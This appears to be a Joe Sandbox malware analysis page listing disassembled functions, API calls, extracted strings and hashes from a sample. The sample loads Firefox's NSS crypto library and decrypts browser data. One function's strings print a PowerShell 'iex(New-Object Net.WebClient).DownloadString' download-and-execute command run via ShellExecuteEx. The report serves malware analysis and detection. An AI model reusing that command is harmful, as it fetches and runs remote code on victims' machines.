Opcode ID: 927eaa8c85b6064df4d06cbcc6e7df46a329383e141a1f121cdcc89a8a246c09
Instruction ID: 5332a6ccbcf6a3ce3bbee11f589f6053350c6383391dcec9502f8368a2a1362b
Opcode Fuzzy Hash: 927eaa8c85b6064df4d06cbcc6e7df46a329383e141a1f121cdcc89a8a246c09
Instruction Fuzzy Hash: D881E8B1A003119BE710DF24DC40AEB77A9BF4924CF044929ED9987B11FB32E919CF92

Function 6C3FDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3FAB10: DeleteCriticalSection.KERNEL32(D958E852,6C401397,5B5F5EC0,?,?,6C3FB1EE,2404110F,?,?), ref: 6C3FAB3C
Part of subcall function 6C3FAB10: free.MOZGLUE(D958E836,?,6C3FB1EE,2404110F,?,?), ref: 6C3FAB49
Part of subcall function 6C3FAB10: DeleteCriticalSection.KERNEL32(5D5E6C5F), ref: 6C3FAB5C
Part of subcall function 6C3FAB10: free.MOZGLUE(5D5E6C53), ref: 6C3FAB63
Part of subcall function 6C3FAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C3FAB6F
Part of subcall function 6C3FAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C3FAB76

TlsGetValue.KERNEL32 ref: 6C3FDCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C3FDD0E
PK11_IsFriendly.NSS3(?), ref: 6C3FDD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C3FDD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3FDE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3FDEA6
PR_Unlock.NSS3(?), ref: 6C3FDF08

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: ba2390d310191d230407895049b2f216329bac0381716a017cb31a81036c6f7f
Instruction ID: 6bff3d9cff14c4d24599cd0050dc07cf8d72b9aaa9fbf7a98ea65716b578d697
Opcode Fuzzy Hash: ba2390d310191d230407895049b2f216329bac0381716a017cb31a81036c6f7f
Instruction Fuzzy Hash: A691D7B5A002059FEB00CF54D884FAAB7B5BF55308F154429DC299B751E732E916CFE2

Function 6C40BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C40BD1E

Part of subcall function 6C3E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C3E2F0A
Part of subcall function 6C3E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C3E2F1D

Part of subcall function 6C4257D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C3EB41E,00000000,00000000,?,00000000,?,6C3EB41E,00000000,00000000,00000001,?), ref: 6C4257E0
Part of subcall function 6C4257D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C425843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C40BD8C

Part of subcall function 6C43FAB0: free.MOZGLUE(?,-00000001,?,?,6C3DF673,00000000,00000000), ref: 6C43FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C40BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C40BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C40BE3A

Part of subcall function 6C3E3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3E3EC2
Part of subcall function 6C3E3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C3E3ED6
Part of subcall function 6C3E3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C3E3EEE
Part of subcall function 6C3E3E60: PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C3E3F02
Part of subcall function 6C3E3E60: PL_FreeArenaPool.NSS3 ref: 6C3E3F14
Part of subcall function 6C3E3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3E3F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C40BE52

Part of subcall function 6C3E2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C3E2CDA,?,00000000), ref: 6C3E2E1E
Part of subcall function 6C3E2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C3E2E33
Part of subcall function 6C3E2E00: TlsGetValue.KERNEL32 ref: 6C3E2E4E
Part of subcall function 6C3E2E00: EnterCriticalSection.KERNEL32(?), ref: 6C3E2E5E
Part of subcall function 6C3E2E00: PL_HashTableLookup.NSS3(?), ref: 6C3E2E71
Part of subcall function 6C3E2E00: PL_HashTableRemove.NSS3(?), ref: 6C3E2E84
Part of subcall function 6C3E2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C3E2E96
Part of subcall function 6C3E2E00: PR_Unlock.NSS3 ref: 6C3E2EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C40BE61

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 858031f5726e960347f9e2e3df13ee0e643c2b922b6744b81310a37ce1a34315
Instruction ID: c71ddaffb44395bfe12546aa67391e5683af1d5e511766c144fd3ed7e1ceff28
Opcode Fuzzy Hash: 858031f5726e960347f9e2e3df13ee0e643c2b922b6744b81310a37ce1a34315
Instruction Fuzzy Hash: 6341E1B6A40220AFD710DF28DC80F6AB7E4EF88718F118169E94897711E731EC04CBD6

Function 006249C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

ShellExecuteEx.SHELL32(?), ref: 00624B18

Strings

C:\ProgramData\, xrefs: 006249F6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00624AAE
')", xrefs: 00624A66
.ps1, xrefs: 00624A46
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00624A6B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: 6970de3c66c4c22b2fecab9af678547e266c4872122f6fdc6625e68734b8c4f2
Instruction ID: 38b32c5d1aff2faa1b6e537c4d9b2650ff3c9121d454190aa2099aea2968f765
Opcode Fuzzy Hash: 6970de3c66c4c22b2fecab9af678547e266c4872122f6fdc6625e68734b8c4f2
Instruction Fuzzy Hash: 47410032E0012AABCF90FBA9EC529CDB7BAAF04310F554829B514B7111DB316F96CF84

Function 6C42AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C42AB3E,?,?,?), ref: 6C42AC35

Part of subcall function 6C40CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C40CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C42AB3E,?,?,?), ref: 6C42AC55

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C42AB3E,?,?), ref: 6C42AC70

Part of subcall function 6C40E300: TlsGetValue.KERNEL32 ref: 6C40E33C
Part of subcall function 6C40E300: EnterCriticalSection.KERNEL32(?), ref: 6C40E350
Part of subcall function 6C40E300: PR_Unlock.NSS3(?), ref: 6C40E5BC
Part of subcall function 6C40E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C40E5CA
Part of subcall function 6C40E300: TlsGetValue.KERNEL32 ref: 6C40E5F2
Part of subcall function 6C40E300: EnterCriticalSection.KERNEL32(?), ref: 6C40E606
Part of subcall function 6C40E300: PORT_Alloc_Util.NSS3(?), ref: 6C40E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C42AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C42AB3E), ref: 6C42ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C42AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C42AD2B

Part of subcall function 6C40F360: TlsGetValue.KERNEL32(00000000,?,6C42A904,?), ref: 6C40F38B
Part of subcall function 6C40F360: EnterCriticalSection.KERNEL32(?,?,?,6C42A904,?), ref: 6C40F3A0
Part of subcall function 6C40F360: PR_Unlock.NSS3(?,?,?,?,6C42A904,?), ref: 6C40F3D3

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: d99147febb9cac89ac223ec0aa508c206ddd25b3f112bddf054651740b0b09ee
Instruction ID: 5b4ab9d0d19c2342e8a6a608cfd19bfd361454a29d89f46dd0a572177e96dfe3
Opcode Fuzzy Hash: d99147febb9cac89ac223ec0aa508c206ddd25b3f112bddf054651740b0b09ee
Instruction Fuzzy Hash: BB3126B1E006055FEB04CF6A8C41DAF76B6EF84328B18812DEC159BB40EB359C1687E1

Function 006194DB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00619550
LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 00619586

Strings

Xwb, xrefs: 00619613
v10, xrefs: 00619517
v20, xrefs: 006194F1
ERROR_V128, xrefs: 00619507

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_V128$Xwb$v10$v20
API String ID: 52611349-272472027
Opcode ID: 3b3bae2a3c3ab25f12c3ee18c6aa6ce0743e88505fadfe684ee60b42ab8e931e
Instruction ID: 8ca6d10ed9adbbfe8bb454cb20e639997cbd81fde49cf1b00c90d1a2508ed1fc
Opcode Fuzzy Hash: 3b3bae2a3c3ab25f12c3ee18c6aa6ce0743e88505fadfe684ee60b42ab8e931e
Instruction Fuzzy Hash: C1319F72A00219ABDB119F78DC55EDF3BBAAB44724F194125F904F7280DB30AA858BE4

Function 6C408C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C408C7C

Part of subcall function 6C4A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DC6
Part of subcall function 6C4A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DD1
Part of subcall function 6C4A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4A9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C408CB0
TlsGetValue.KERNEL32 ref: 6C408CD1
EnterCriticalSection.KERNEL32(?), ref: 6C408CE5
PR_Unlock.NSS3(?), ref: 6C408D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C408D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C408D93

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: a4964590a31b2787a0b4942b565b70ddde49020e6e719e4c0e73e3c30f6cd300
Instruction ID: 7c23996e14adc3bde8b3bcba44c164e09006841282be7aed6bb9e8771799c4dd
Opcode Fuzzy Hash: a4964590a31b2787a0b4942b565b70ddde49020e6e719e4c0e73e3c30f6cd300
Instruction Fuzzy Hash: F5313571B41205ABE700EF68DD40FAAB7B0BF54319F14023AEA1967B90E730A964CBC1

Function 6C449D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C449C5B), ref: 6C449D82

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C449C5B), ref: 6C449DA9

Part of subcall function 6C441340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C3DF599,?,00000000), ref: 6C44136A
Part of subcall function 6C441340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C3DF599,?,00000000), ref: 6C44137E
Part of subcall function 6C441340: PL_ArenaGrow.NSS3(?,6C3DF599,?,00000000,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C3DF599,?), ref: 6C4413CF
Part of subcall function 6C441340: PR_Unlock.NSS3(?,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C3DF599,?,00000000), ref: 6C44145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C449C5B), ref: 6C449DCE

Part of subcall function 6C441340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C3DF599,?,00000000), ref: 6C4413F0
Part of subcall function 6C441340: PL_ArenaGrow.NSS3(?,6C3DF599,?,?,?,00000000,00000000,?,6C3E895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C441445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C449C5B), ref: 6C449DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C449C5B), ref: 6C449DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C449C5B), ref: 6C449E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C449C5B), ref: 6C449E91

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

Part of subcall function 6C441560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C43FAAB,00000000), ref: 6C44157E
Part of subcall function 6C441560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C43FAAB,00000000), ref: 6C441592
Part of subcall function 6C441560: memset.VCRUNTIME140(?,00000000,?), ref: 6C441600
Part of subcall function 6C441560: PL_ArenaRelease.NSS3(?,?), ref: 6C441620
Part of subcall function 6C441560: PR_Unlock.NSS3(?), ref: 6C441639

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 5e4a0ba6b7204b9466ada5c9c2c8c1b1352f48978e0ca09359e0aa801edad160
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: A54168B4601602AFF700CF14D940F92BBA5FF55359F248128D8188BFA1EB72E834DB80

Function 6C40DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C40DDEC

Part of subcall function 6C440840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4408B4

PK11_DigestBegin.NSS3(00000000), ref: 6C40DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C40DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C40DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C40DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C40DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C40DECC

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 3fb5607f062ca3c7ea3abdea1ea1e6a9e55ad1bbbc81a014c4e1439ced41dd22
Instruction ID: 8865dcddf8a40b6fdd71da8ca10b0be64b5c540878ec94b2cb970a54086b25f3
Opcode Fuzzy Hash: 3fb5607f062ca3c7ea3abdea1ea1e6a9e55ad1bbbc81a014c4e1439ced41dd22
Instruction Fuzzy Hash: 0D31C7B2A406146BEB00EF64AC41FBB76B8DF54608F150139ED09A7742FB31D91CC6E2

Function 6C43DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C43D9E4,00000000), ref: 6C43DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C43D9E4,00000000), ref: 6C43DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C43D9E4,00000000), ref: 6C43DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C43DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C43DCAD

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: a272297c39954d2e21da91f6837fb1c0d40137be0cdad2519139f661e4352609
Instruction ID: 6fb7658530208f9dda8c68577f11d5fb1b53a30c6c584d61347449ca1a85e864
Opcode Fuzzy Hash: a272297c39954d2e21da91f6837fb1c0d40137be0cdad2519139f661e4352609
Instruction Fuzzy Hash: EC319EB5A202109FE710CF1AD880F56B7F8EF88359F248028E94DCBB01E771E954CBA1

Function 6C402E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C3FE728,?,00000038,?,?,00000000), ref: 6C402E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C402E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C402E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C402E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C402E9E
PR_Unlock.NSS3(?), ref: 6C402EAB
PR_Unlock.NSS3(?), ref: 6C402F0D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

